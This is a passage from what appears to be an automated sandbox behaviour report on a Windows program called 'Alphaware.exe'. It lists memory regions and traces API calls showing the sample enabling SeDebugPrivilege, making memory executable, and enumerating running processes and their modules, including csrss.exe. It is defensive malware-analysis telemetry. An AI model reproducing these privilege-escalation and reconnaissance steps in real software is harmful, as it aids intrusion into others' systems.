"c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000c.db") Region: id = 611 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 612 start_va = 0x7fefd780000 end_va = 0x7fefd78efff monitored = 0 entry_point = 0x7fefd7819b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 613 start_va = 0x4b0000 end_va = 0x4b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 614 start_va = 0x570000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 615 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 616 start_va = 0x21c0000 end_va = 0x2225fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 617 start_va = 0x1b840000 end_va = 0x1b93ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b840000" filename = "" Region: id = 618 start_va = 0x7ffffef8000 end_va = 0x7ffffef9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ffffef8000" filename = "" Region: id = 619 start_va = 0x7fefdc80000 end_va = 0x7fefde56fff monitored = 0 entry_point = 0x7fefdc81010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 620 start_va = 0x7fefd9a0000 end_va = 0x7fefd9d5fff monitored = 0 entry_point = 0x7fefd9a1474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 621 start_va = 0x7fefd980000 end_va = 0x7fefd999fff monitored = 0 entry_point = 0x7fefd981558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 622 start_va = 0x2080000 end_va = 0x208cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 623 start_va = 0x1b940000 end_va = 0x1ba40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 624 start_va = 0x1b940000 end_va = 0x1ba40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 625 start_va = 0x1b940000 end_va = 0x1ba40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 626 start_va = 0x1b940000 end_va = 0x1ba40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 627 start_va = 0x1b940000 end_va = 0x1ba40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 628 start_va = 0x1b940000 end_va = 0x1ba40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 629 start_va = 0x1b940000 end_va = 0x1ba40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 630 start_va = 0x1b940000 end_va = 0x1ba40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 631 start_va = 0x1b940000 end_va = 0x1ba40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 632 start_va = 0x1b940000 end_va = 0x1ba40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 633 start_va = 0x1b940000 end_va = 0x1ba40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 634 start_va = 0x1b940000 end_va = 0x1ba40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 635 start_va = 0x1b940000 end_va = 0x1ba40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 636 start_va = 0x1b940000 end_va = 0x1ba40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b940000" filename = "" Region: id = 637 start_va = 0x1b950000 end_va = 0x1ba4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b950000" filename = "" Region: id = 638 start_va = 0x1ba50000 end_va = 0x1bb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba50000" filename = "" Region: id = 639 start_va = 0x7ffffef6000 end_va = 0x7ffffef7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ffffef6000" filename = "" Region: id = 640 start_va = 0x1ba50000 end_va = 0x1bb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba50000" filename = "" Region: id = 641 start_va = 0x1ba50000 end_va = 0x1bb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba50000" filename = "" Region: id = 642 start_va = 0x1ba50000 end_va = 0x1bb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba50000" filename = "" Region: id = 643 start_va = 0x1ba50000 end_va = 0x1bb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba50000" filename = "" Region: id = 644 start_va = 0x1ba50000 end_va = 0x1bb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba50000" filename = "" Region: id = 645 start_va = 0x1ba50000 end_va = 0x1bb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba50000" filename = "" Region: id = 646 start_va = 0x1ba50000 end_va = 0x1bb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba50000" filename = "" Region: id = 647 start_va = 0x1ba50000 end_va = 0x1bb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba50000" filename = "" Region: id = 648 start_va = 0x1ba50000 end_va = 0x1bb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba50000" filename = "" Region: id = 649 start_va = 0x1ba50000 end_va = 0x1bb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba50000" filename = "" Region: id = 650 start_va = 0x1ba50000 end_va = 0x1bb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba50000" filename = "" Region: id = 651 start_va = 0x1ba50000 end_va = 0x1bb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba50000" filename = "" Region: id = 652 start_va = 0x1ba50000 end_va = 0x1bb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ba50000" filename = "" Region: id = 653 start_va = 0x7fefa0f0000 end_va = 0x7fefa146fff monitored = 0 entry_point = 0x7fefa0f1118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 654 start_va = 0x7fefb200000 end_va = 0x7fefb233fff monitored = 0 entry_point = 0x7fefb201890 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 655 start_va = 0x2090000 end_va = 0x209dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 656 start_va = 0x7feff510000 end_va = 0x7feff687fff monitored = 0 entry_point = 0x7feff5110e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 657 start_va = 0x7fefde60000 end_va = 0x7fefdf89fff monitored = 0 entry_point = 0x7fefde610d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 658 start_va = 0x7fefeea0000 end_va = 0x7feff0f8fff monitored = 0 entry_point = 0x7fefeea1340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 659 start_va = 0x7fefd9e0000 end_va = 0x7fefdb4cfff monitored = 0 entry_point = 0x7fefd9e10b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 660 start_va = 0x7fefd820000 end_va = 0x7fefd82efff monitored = 0 entry_point = 0x7fefd821020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 661 start_va = 0x20a0000 end_va = 0x20a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Thread: id = 1 os_tid = 0xea8 [0039.575] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0040.146] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x41c6d8 | out: phkResult=0x41c6d8*=0x0) returned 0x2 [0040.148] RegCloseKey (hKey=0xffffffff80000002) returned 0x0 [0040.158] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0040.169] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41d130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0040.208] VirtualProtect (in: lpAddress=0xf2000, dwSize=0xff0dc, flNewProtect=0x40, lpflOldProtect=0x41d8d8 | out: lpflOldProtect=0x41d8d8*=0x80) returned 1 [0041.666] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x600, lpName=0x0) returned 0x24 [0041.666] memcpy (in: _Dst=0x450000, _Src=0x243c518, _Size=0x600 | out: _Dst=0x450000) returned 0x450000 [0041.667] CloseHandle (hObject=0x24) returned 1 [0042.567] GetEnvironmentVariableW (in: lpName="COR_ENABLE_PROFILING", lpBuffer=0x41cee0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0043.169] GetUserNameW (in: lpBuffer=0x419cf0, pcbBuffer=0x41a018 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x41a018) returned 1 [0043.764] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x41dc30 | out: lpLuid=0x41dc30*(LowPart=0x14, HighPart=0)) returned 1 [0043.766] GetCurrentProcess () returned 0xffffffffffffffff [0043.766] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x41dc28 | out: TokenHandle=0x41dc28*=0x218) returned 1 [0043.768] AdjustTokenPrivileges (in: TokenHandle=0x218, DisableAllPrivileges=0, NewState=0x244d270*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0043.771] CloseHandle (hObject=0x218) returned 1 [0043.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x126c0b70, Length=0x20000, ResultLength=0x41eb60 | out: SystemInformation=0x126c0b70, ResultLength=0x41eb60*=0x122b0) returned 0x0 [0043.850] GetCurrentProcessId () returned 0xea4 [0043.859] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb0) returned 0x218 [0043.871] EnumProcessModules (in: hProcess=0x218, lphModule=0x247de50, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x247de50, lpcbNeeded=0x41eb20) returned 1 [0043.873] GetModuleInformation (in: hProcess=0x218, hModule=0x9b0000, lpmodinfo=0x247e0c0, cb=0x18 | out: lpmodinfo=0x247e0c0*(lpBaseOfDll=0x9b0000, SizeOfImage=0x17000, EntryPoint=0x9b14a1)) returned 1 [0043.874] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.874] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x9b0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="pidgin.exe") returned 0xa [0043.875] CoTaskMemFree (pv=0x780780) [0043.876] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.876] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x9b0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Defender\\pidgin.exe" (normalized: "c:\\program files\\windows defender\\pidgin.exe")) returned 0x2c [0043.876] CoTaskMemFree (pv=0x780780) [0043.877] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2480310, cb=0x18 | out: lpmodinfo=0x2480310*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0043.877] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.877] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0043.877] CoTaskMemFree (pv=0x780780) [0043.878] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.878] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0043.879] CoTaskMemFree (pv=0x780780) [0043.879] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x24824d0, cb=0x18 | out: lpmodinfo=0x24824d0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0043.879] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.879] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0043.880] CoTaskMemFree (pv=0x780780) [0043.880] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.880] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0043.880] CoTaskMemFree (pv=0x780780) [0043.880] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2484690, cb=0x18 | out: lpmodinfo=0x2484690*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0043.881] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.881] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0043.882] CoTaskMemFree (pv=0x780780) [0043.882] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.882] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0043.882] CoTaskMemFree (pv=0x780780) [0043.883] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2486860, cb=0x18 | out: lpmodinfo=0x2486860*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0043.883] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.883] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0043.884] CoTaskMemFree (pv=0x780780) [0043.884] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.884] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0043.885] CoTaskMemFree (pv=0x780780) [0043.886] CloseHandle (hObject=0x218) returned 1 [0043.905] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0043.905] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x218 [0043.905] EnumProcessModules (in: hProcess=0x218, lphModule=0x2488f70, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2488f70, lpcbNeeded=0x41eb20) returned 1 [0043.906] GetModuleInformation (in: hProcess=0x218, hModule=0x4a3d0000, lpmodinfo=0x24891e0, cb=0x18 | out: lpmodinfo=0x24891e0*(lpBaseOfDll=0x4a3d0000, SizeOfImage=0x6000, EntryPoint=0x4a3d1540)) returned 1 [0043.907] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.907] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x4a3d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="csrss.exe") returned 0x9 [0043.907] CoTaskMemFree (pv=0x780780) [0043.907] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.907] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x4a3d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\csrss.exe" (normalized: "c:\\windows\\system32\\csrss.exe")) returned 0x1d [0043.908] CoTaskMemFree (pv=0x780780) [0043.908] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x248b3d8, cb=0x18 | out: lpmodinfo=0x248b3d8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0043.908] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.908] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0043.909] CoTaskMemFree (pv=0x780780) [0043.909] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.909] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0043.910] CoTaskMemFree (pv=0x780780) [0043.910] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd800000, lpmodinfo=0x248d598, cb=0x18 | out: lpmodinfo=0x248d598*(lpBaseOfDll=0x7fefd800000, SizeOfImage=0x13000, EntryPoint=0x7fefd807c30)) returned 1 [0043.910] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.910] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd800000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CSRSRV.dll") returned 0xa [0043.911] CoTaskMemFree (pv=0x780780) [0043.911] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.911] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd800000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CSRSRV.dll" (normalized: "c:\\windows\\system32\\csrsrv.dll")) returned 0x1e [0043.912] CoTaskMemFree (pv=0x780780) [0043.912] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd7e0000, lpmodinfo=0x248f758, cb=0x18 | out: lpmodinfo=0x248f758*(lpBaseOfDll=0x7fefd7e0000, SizeOfImage=0x11000, EntryPoint=0x7fefd7eb1ec)) returned 1 [0043.912] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.912] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd7e0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="basesrv.DLL") returned 0xb [0043.913] CoTaskMemFree (pv=0x780780) [0043.913] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.913] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd7e0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\basesrv.DLL" (normalized: "c:\\windows\\system32\\basesrv.dll")) returned 0x1f [0043.914] CoTaskMemFree (pv=0x780780) [0043.914] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd7a0000, lpmodinfo=0x2491918, cb=0x18 | out: lpmodinfo=0x2491918*(lpBaseOfDll=0x7fefd7a0000, SizeOfImage=0x38000, EntryPoint=0x7fefd7a27c0)) returned 1 [0043.915] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.915] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd7a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="winsrv.DLL") returned 0xa [0043.916] CoTaskMemFree (pv=0x780780) [0043.916] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.916] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd7a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\winsrv.DLL" (normalized: "c:\\windows\\system32\\winsrv.dll")) returned 0x1e [0043.917] CoTaskMemFree (pv=0x780780) [0043.926] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x2493b30, cb=0x18 | out: lpmodinfo=0x2493b30*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0043.927] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.927] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0043.928] CoTaskMemFree (pv=0x780780) [0043.928] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.928] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0043.929] CoTaskMemFree (pv=0x780780) [0043.929] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x2495cf0, cb=0x18 | out: lpmodinfo=0x2495cf0*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0043.929] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.930] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0043.930] CoTaskMemFree (pv=0x780780) [0043.930] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.930] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0043.931] CoTaskMemFree (pv=0x780780) [0043.931] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x2497eb0, cb=0x18 | out: lpmodinfo=0x2497eb0*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0043.933] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.933] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0043.934] CoTaskMemFree (pv=0x780780) [0043.934] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.934] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0043.935] CoTaskMemFree (pv=0x780780) [0043.935] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x249a098, cb=0x18 | out: lpmodinfo=0x249a098*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0043.936] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.936] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0043.937] CoTaskMemFree (pv=0x780780) [0043.937] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.937] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0043.938] CoTaskMemFree (pv=0x780780) [0043.938] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x249c300, cb=0x18 | out: lpmodinfo=0x249c300*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0043.939] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.939] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0043.940] CoTaskMemFree (pv=0x780780) [0043.940] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.940] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0043.941] CoTaskMemFree (pv=0x780780) [0043.941] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x249e4b0, cb=0x18 | out: lpmodinfo=0x249e4b0*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0043.942] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.942] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0043.943] CoTaskMemFree (pv=0x780780) [0043.943] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.944] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0043.945] CoTaskMemFree (pv=0x780780) [0043.945] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x24a0670, cb=0x18 | out: lpmodinfo=0x24a0670*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0043.946] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.946] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0043.947] CoTaskMemFree (pv=0x780780) [0043.947] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.947] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0043.949] CoTaskMemFree (pv=0x780780) [0043.949] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd790000, lpmodinfo=0x24a2830, cb=0x18 | out: 